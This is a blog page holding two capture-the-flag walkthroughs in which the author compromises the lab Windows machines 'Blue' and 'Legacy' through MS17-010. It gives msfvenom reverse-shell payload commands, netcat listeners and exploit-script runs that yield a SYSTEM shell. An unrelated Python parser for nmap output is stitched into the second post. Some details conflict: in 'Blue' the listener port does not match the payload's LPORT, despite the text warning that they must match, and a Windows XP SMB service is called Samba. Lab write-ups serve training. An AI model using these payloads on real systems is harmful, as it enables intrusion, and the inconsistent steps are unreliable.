Category: htb

  • Taking down Blue (a Windows machine), without using Metasploit

    Today I am going to take down a machine called ‘Blue’. It’s a Windows 7 based machine. I didn’t expect that I could pwn the machine quite so easily… Anyway, here is my walkthrough of it. By the way, this is not necessarily the only way to compromise the machine. OK, enough said, let’s do some work…

    nmap -sC -sV 10.10.10.40 -o nmap1.log
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    49152/tcp open msrpc Microsoft Windows RPC
    49153/tcp open msrpc Microsoft Windows RPC
    49154/tcp open msrpc Microsoft Windows RPC
    49155/tcp open msrpc Microsoft Windows RPC
    49156/tcp open msrpc Microsoft Windows RPC
    49157/tcp open msrpc Microsoft Windows RPC
    Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
    nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
    Nmap scan report for 10.10.10.40
    Host is up (0.43s latency).
    Not shown: 991 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    49152/tcp open unknown
    49153/tcp open unknown
    49154/tcp open unknown
    49155/tcp open unknown
    49156/tcp open unknown
    49157/tcp open unknown
    
    Host script results: 
    |_smb-vuln-ms10-054: false 
    |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
    | smb-vuln-ms17-010: 
    | VULNERABLE: 
    | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
    | State: VULNERABLE 
    | IDs: CVE:CVE-2017-0143 
    | Risk factor: HIGH 
    | A critical remote code execution vulnerability exists in Microsoft SMBv1 
    | servers (ms17-010).

    After some googling, I found that this repository has everything you need for MS17-010 (aka EternalBlue):

    git clone https://github.com/helviojunior/MS17-010.git
    
    cd MS17-010

    We need to build a simple payload (an executable that creates a reverse connection from the Windows 7 machine back to our Kali Linux machine). Remember, we are never going to depend on the Meterpreter shell, which is not allowed in the exam; therefore, in lieu of that shell, I am going to use the shell_reverse_tcp payload.

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

    I don’t think you need me to explain what those options do, because I have done so in my previous post. It is here.

    Although the MS17-010 repository contains the exploit, I didn’t use it; instead I manually searched for an exploit on exploit-db:

    searchsploit MS17-010

    cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

    Then we need to modify the exploit code. (I have highlighted the line that needs to be modified.)

    You need to fill in the guest username (you can see it either from the nmap result, or the following command can help you confirm that there is a guest user). By the way, there are two ways to fill in the guest user. One is the conventional way, placing the username as guest; the other is simply filling the place with // (yes, two forward slashes between the quotes).

    Once the modification is done, follow these steps.

    I usually split the terminal using tmux; in one shell you need to wait for the reverse connection from the Windows machine (the port the listener binds must match the LPORT you gave to msfvenom, otherwise the connection never arrives).

    nc -lvp 1234

    And in another shell:

    python 42315.py 10.10.10.40

    Once you are successful, you will get the system32 prompt as in the screenshot below..


    User flag (remember, type in a Windows command prompt is the same as cat in Linux – I know this claim is a stretch, but let us leave it like this for the time being)

    Finally the root flag…

  • Taking down Legacy (a Windows machine) without using Metasploit

    Hello guys,
    Today I am going to take down one simple box from Hack The Box. Recently I purchased VIP lab access. By the way, the machine is called Legacy and it’s a Windows machine.

    This is my first write-up of machines from that lab.

    Since we already have the machine’s IP address (it’s shown in the web portal), let’s check which ports are open and what services are running..

    Overview:
    
    Machine IP: 10.10.10.4
    Kali Linux: 10.10.14.10
    
    Target:
    1. To get the user flag
    2. To get the root flag

    Information Gathering Phase:

    nmap -sC -sV 10.10.10.4 -Pn
    Nmap scan report for 10.10.10.4
    PORT STATE SERVICE VERSION
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds Windows XP microsoft-ds
    Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
    

    From the above result, we can conclude that the target machine is running Windows XP and has ports 139 and 445 open. Besides, it is running a Samba server.

    If you want more detail, you can also run the above command with the -v option. (However, the attached screenshot shows the result of the command without the -v option.)

    nmap -sC -sV -v -p139,445 10.10.10.4 -o nmap.log -Pn

    Based on the above result, we are certain that this Samba version is vulnerable. However, the following NSE script (nmap script) can give us better vulnerability details, and it will also recommend related exploits if it has any.

    nmap --script smb-vuln* -o nmap_smb_vul.log -Pn 10.10.10.4
    PORT STATE SERVICE
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    Host script results:
    | smb-vuln-ms08-067:
    | VULNERABLE:
    | Microsoft Windows system vulnerable to remote code execution (MS08-067)
    | State: VULNERABLE
    | IDs: CVE:CVE-2008-4250
    | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
    | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
    | code via a crafted RPC request that triggers the overflow during path canonicalization.
    |
    | Disclosure date: 2008-10-23
    | References:
    | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
    |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
    | smb-vuln-ms17-010:
    | VULNERABLE:
    | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    | State: VULNERABLE
    | IDs: CVE:CVE-2017-0143
    | Risk factor: HIGH
    | A critical remote code execution vulnerability exists in Microsoft SMBv1
    | servers (ms17-010).
    |
    | Disclosure date: 2017-03-14
    | References:
    | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
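    Reading smb-vuln* output by hand, as in both the Blue and Legacy scans above, gets tedious on more than one host. The parser below is an added example (not part of the original post or of nmap): it turns the Host script results block into a map of script → state/CVE ids/risk factor, so a defender can turn a scan straight into a patch list. The embedded sample output is constructed from the format quoted above, not real scan data.

```python
"""Triage helper for the nmap smb-vuln* output quoted in the Blue and Legacy scans."""
import re
# Constructed sample modelled on the post's NSE output (not real scan data).
SAMPLE_SCAN = """\
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

# '|_smb-vuln-ms10-054: false' (one-line verdict) or '| smb-vuln-ms17-010:' (details follow)
SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")

def parse_smb_vuln(text):
    """Map each smb-vuln script to its State, CVE ids and Risk factor."""
    results, current = {}, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = SCRIPT_RE.match(line)
        if m:  # new script entry; a one-line verdict (false / ERROR ...) is its state
            current = results.setdefault(m.group(1), {"state": None, "cves": [], "risk": None})
            if m.group(2).strip():
                current["state"] = m.group(2).strip()
            continue
        if current is None or not line.startswith("|"):
            continue  # text outside the Host script results block
        body = line.lstrip("|_ ")
        if body.startswith("State:"):
            current["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):  # only the IDs line counts; reference URLs are ignored
            current["cves"].extend(re.findall(r"CVE-\d{4}-\d+", body))
        elif body.startswith("Risk factor:"):
            current["risk"] = body.split(":", 1)[1].strip()
    return results

def vulnerable_cves(results):
    """Sorted CVE ids from every script that reported State: VULNERABLE."""
    return sorted(c for r in results.values() if r["state"] == "VULNERABLE" for c in r["cves"])
```

    Scripts that return false or an ERROR keep that text as their state, so a failed script (like ms10-061 above) is visibly "unknown" rather than silently treated as not vulnerable.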

    You can clearly see that it has suggested two exploits; however, since the first one is having some issue (which I colored red), I am going to use the second exploit. (Note: I must share with you that this is not an absolute approach, because sometimes minor changes to the exploit might make it work, so try to fix the issues with the first exploit if time permits.)

    Although I found many exploits for MS17-010, I am going to do it without using Metasploit (which is a powerful automation framework). So let’s do some shopping online.

    We are going to clone a GitHub repository… (There are many GitHub accounts with exploit code for MS17-010, but we need one with a “send script” (send_and_execute.py) to send the payload from our host machine (Kali Linux) to the remote machine (Windows machine). Since many GitHub repositories don’t have the script send_and_execute.py, I am emphasizing it. Perhaps if you read further you will understand its importance.)

    git clone https://github.com/helviojunior/MS17-010
    
    cd MS17-010
    
    
    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

    I was a little skeptical about using msfvenom at the beginning, as in the OSCP exam we are allowed to use Metasploit only twice (and my plan is not to use it at all). Nevertheless, after reading a couple of blogs by senior OSCPians, I understood that we can use msfvenom, and they discouraged using Meterpreter.

    -p  payload
    LHOST  local host (the address the connection comes back to)
    LPORT  local port
    
    I might need to explain a little regarding EXITFUNC=thread:
    - The EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete.
    - The thread method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread, and exiting this thread results in a working application/system (clean exit).
    - To know more, kindly visit this link.
    
    -f  output format
    -a  architecture
    -o  output file and path

    If you have observed carefully, you might have noticed that our payload ms17-010.exe (which uses windows/shell_reverse_tcp) will give us a reverse connection to our Kali Linux machine (the local host) on LPORT 1234.

    Therefore, I will wait for a reverse connection to my LHOST on LPORT 1234.

    nc -lvp 1234

    And in another terminal (remember to cd into the MS17-010 folder if you are opening a fresh terminal), run the following command. (By the way, I highly recommend using tmux to split the terminal and enhance your productivity.)

    python send_and_execute.py 10.10.10.4 ms17-010.exe

    Yes, if you are successful, the terminal that was listening on port 1234 will receive the reverse connection and you will see something like the following screenshot. (Focus on the highlighted area.)

    I will not bore you with my English (Tibetish lol), so I have attached the following steps as screenshots.

    That’s all guys … See you in the next post 🙂